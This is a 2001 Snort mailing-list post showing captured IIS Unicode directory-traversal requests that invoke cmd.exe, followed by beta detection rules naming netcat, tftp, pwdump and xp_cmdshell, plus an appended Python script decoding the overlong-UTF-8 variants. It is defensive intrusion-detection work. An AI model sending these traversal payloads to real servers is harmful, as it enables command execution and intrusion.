[Snort-users] The NT testing begins...

Jim Forster jforster at ...176...
Tue Mar 13 18:10:02 EST 2001


It appears the 'testing' for those IIS issues has begun...  Just got hit
with these, starting today...

The 'test' rules I'm messing with follow these. Most are based on the
"Running Snort on IIS Web Servers Part 2" paper by Mark Burnett. Some very
good ideas in there! :)
(It is a mix of known files the server will have, and more generic filenames
which are only valid if the attacker didn't change the executable name.)

Anyone else getting these starting today, or am I just the 'lucky one' so
far?  :P

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 30 25 61 66 2E 2E 2F 2E 2E 25 63 30 25 61 66   c0%af../..%c0%af
020 : 2E 2E 2F 2E 2E 25 63 30 25 61 66 2E 2E 2F 77 69   ../..%c0%af../wi
030 : 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64   nnt/system32/cmd
040 : 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A 5C 20   .exe?/c+dir+c:\
050 : 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A               HTTP/1.0....

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 66 69 6C   GET /scripts/fil
010 : 65 2E 62 61 74 2F 2E 2E 25 43 31 25 39 43 2E 2E   e.bat/..%C1%9C..
020 : 25 43 31 25 39 43 2E 2E 25 43 31 25 39 43 77 69   %C1%9C..%C1%9Cwi
030 : 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64   nnt/system32/cmd
040 : 2E 65 78 65 3F 2F 63 25 32 30 64 69 72 2B 20 48   .exe?/c%20dir+ H
050 : 54 54 50 2F 31 2E 30 0A 0A                        TTP/1.0..

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 66 69 6C   GET /scripts/fil
010 : 65 2E 62 61 74 2F 2E 2E C1 9C 2E 2E C1 9C 2E 2E   e.bat/..........
020 : C1 9C 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ..winnt/system32
030 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 20 64 69 72 2B   /cmd.exe?/c dir+
040 : 20 48 54 54 50 2F 31 2E 30 0A 0A                   HTTP/1.0..


New 'beta' rules you can toss in local.rules if you'd like to help test 'em
out....
------------------------------------------------------------------------------
alert tcp $HOME_NET 80 -> $EXTERNAL_NET any (msg:"Outgoing dir list"; content:"Directory Listing of"; nocase;)
alert tcp $HOME_NET 80 -> $EXTERNAL_NET any (msg:"Outgoing file ok"; content:"1 file(s) copied"; nocase;)
alert tcp $HOME_NET 80 -> $EXTERNAL_NET any (msg:"Outgoing Cmd completed"; content:"Command completed"; nocase;)
alert tcp $HOME_NET 80 -> $EXTERNAL_NET any (msg:"Outgoing error"; content:"Bad command or filename"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS global-asa access"; flags: A+; content:"global.asa"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-MISC Attempt to execute cmd"; flags: A+; content:"cmd.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS ftp attempt"; flags: A+; content:"ftp.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS tftp attempt"; flags: A+; content:"tftp.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS net attempt"; flags: A+; content:"net.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS telnet attempt"; flags: A+; content:"telnet.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS rcmd attempt"; flags: A+; content:"rcmd.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS wsh attempt"; flags: A+; content:"wsh.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS csh attempt"; flags: A+; content:"csh.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS perl attempt"; flags: A+; content:"perl.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS nc attempt"; flags: A+; content:"nc.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS lsadump2 attempt"; flags: A+; content:"lsadump2.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS pwdump attempt"; flags: A+; content:"pwdump.exe"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS cmdshell attempt"; flags: A+; content:"xp_cmdshell"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS availablemedia attempt"; flags: A+; content:"xp_availablemedia"; nocase;)

Jim Forster
Network Administrator
RapidNet / DakotaConnect
--------------------------------------------
http://www.snort.org
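As an added example (not part of the post above and not Snort code), the following Python script decodes the three captured request lines the way the server on the receiving end would, and runs a few of the post's content matches over them. The request bytes are transcribed from the three hex dumps in the message; the rule table, the `analyze` helper and the literal `../` comparison rule are this example's own assumptions. It shows why matching on the executable name (`cmd.exe`) fires on all three variants, while a rule matching a literal `../` would fire only on the first one, since the other two carry the traversal only in overlong UTF-8 form (`%C1%9C`, or the raw bytes C1 9C) and never put `../` on the wire.

```python
# Added example (not from the post, not Snort code): decode the IIS "Unicode"
# traversal variants captured above and run content-style checks over them.
# The three requests are constructed by transcribing the post's packet dumps.
from urllib.parse import unquote_to_bytes

SAMPLE_REQUESTS = [
    # %c0%af is an overlong two-byte encoding of '/'
    b"GET /scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\r\n\r\n",
    # %C1%9C is an overlong two-byte encoding of '\'
    b"GET /scripts/file.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir+ HTTP/1.0\n\n",
    # same traversal with the raw bytes C1 9C sent unescaped
    b"GET /scripts/file.bat/..\xc1\x9c..\xc1\x9c..\xc1\x9cwinnt/system32/cmd.exe?/c dir+ HTTP/1.0\n\n",
]

# Stand-in for a few of the post's inbound rules: (msg, content), all nocase.
CONTENT_RULES = [
    ("WEB-MISC Attempt to execute cmd", b"cmd.exe"),
    ("WEB-IIS ftp attempt", b"ftp.exe"),
    ("WEB-IIS tftp attempt", b"tftp.exe"),
    ("WEB-IIS nc attempt", b"nc.exe"),
    ("WEB-IIS cmdshell attempt", b"xp_cmdshell"),
]
# Hypothetical rule (assumption, not in the post) matching a literal "../".
NAIVE_TRAVERSAL_CONTENT = b"../"


def decode_overlong_utf8(data: bytes) -> bytes:
    """Fold overlong two-byte UTF-8 sequences (lead byte C0 or C1) back to the
    ASCII byte they encode; every other byte passes through unchanged."""
    out = bytearray()
    i = 0
    while i < len(data):
        lead = data[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)


def decoded_path(request: bytes) -> str:
    """Request-line path as the server resolves it: percent-decoded, overlong
    UTF-8 folded, and backslashes treated as path separators."""
    target = request.split(b" ", 2)[1]           # "GET <target> HTTP/1.0"
    path = target.split(b"?", 1)[0]              # drop the query string
    path = decode_overlong_utf8(unquote_to_bytes(path))
    return path.replace(b"\\", b"/").decode("latin-1")


def escape_depth(path: str) -> int:
    """Number of '..' segments that climb above the URL root after resolution;
    anything greater than zero means the request left the web tree."""
    stack, escapes = [], 0
    for seg in path.split("/"):
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escapes += 1
        elif seg not in ("", "."):
            stack.append(seg)
    return escapes


def matching_rules(request: bytes) -> list:
    """msg strings of the content rules that fire on the raw request (nocase)."""
    low = request.lower()
    return [msg for msg, content in CONTENT_RULES if content.lower() in low]


def analyze(request: bytes) -> dict:
    """Compare what a raw-byte match sees with what the decoded path contains."""
    path = decoded_path(request)
    return {
        "raw_dotdot": NAIVE_TRAVERSAL_CONTENT in request,   # literal "../" on the wire?
        "decoded_dotdot": "../" in path,                     # "../" once decoded?
        "escape_depth": escape_depth(path),
        "rules": matching_rules(request),
    }


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(decoded_path(req), analyze(req))
```

Running it prints the resolved path for each capture (the first climbs five directories above the URL root, the other two one) and shows `raw_dotdot` true only for the first request, while `decoded_dotdot` and the `cmd.exe` rule hit all three. That is the practical reason the post's rules key on filenames rather than on the traversal itself, and also the reason a filename-based rule is defeated the moment the attacker renames the executable, as the post's parenthetical notes.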
